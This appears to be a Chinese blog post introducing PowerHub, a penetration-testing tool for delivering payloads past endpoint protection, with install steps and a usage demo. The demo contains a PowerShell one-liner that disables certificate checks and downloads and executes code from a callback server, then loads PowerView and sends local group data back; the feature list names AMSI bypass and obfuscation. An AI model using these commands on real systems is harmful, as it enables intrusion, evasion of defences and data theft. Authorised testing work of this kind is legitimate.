PowerHub:一款基于Web的渗透测试数据传输与端点管理工具

2024-12-20 7 0

关于PowerHub

PowerHub是一款基于Web应用程序的渗透测试数据传输与端点管理工具,该工具可以帮助渗透测试人员传输数据,尤其是那些被端点保护标记的代码。

功能特性

1、无文件;

2、无状态;

3、证书绑定;

4、通过 RC4 加密对字符串进行“混淆”;

5、支持AMSI旁路;

6、支持用于内存中执行 C# 程序的透明别名;

工具要求

PowerShell

Python 3

工具安装

由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。

源码获取

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/AdrianVollmer/PowerHub.git

PyPI安装(建议)

PowerHub现已托管在了PyPI上,我们可以像安装其他 Python 包一样安装它:

python3 -m pip install powerhub

如需构建二进制Payload,则需要 MinGW GCC 和 Mono C# 编译器。在类似 Debian 的系统上,可以使用下列命令安装它们:

apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686

安装后,~/.local/bin中将出现两个新的可执行文件:

powerhub

power-obfuscate

接下来,运行下列命令即可:

powerhub <CALLBACK HOST> --auth powerhub:<PASSWORD><CALLBACK HOST><PASSWORD>https://<CALLBACK HOST>:8443

工具使用

获取有关本地组的信息并将其传回:

PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')

  _____   _____  _  _  _ _______  ______ _     _ _     _ ______

 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]

 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]

2.0.0                       written by Adrian Vollmer, 2018-2024

Run 'Help-PowerHub' for help

PS C:\Users\avollmer> Get-HubModule PowerView

 

Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1

Type   : ps1

N      : 205

Loaded : True

Alias  :

 

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json

工具运行演示

许可证协议

本项目的开发与发布遵循MIT开源许可协议。

项目地址

PowerHub:【GitHub传送门

参考资料

https://adrianvollmer.github.io/PowerHub/


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

Matildapp:针对Web 3.0环境的网络安全与渗透测试框架
Jumpserver_decrypto: 解密 Jumpserver ssh配置的开源工具
向日葵远程控制软件远程代码执行漏洞复现(CNVD-2022-10270, CNVD-2022-03672)
Kafka UI三大RCE高危漏洞分析
PbootCMS V3.2.9前台SQL注入漏洞(上)
修复秘籍:如何有效应对CVE-2024-20767和CVE-2024-21216漏洞

发布评论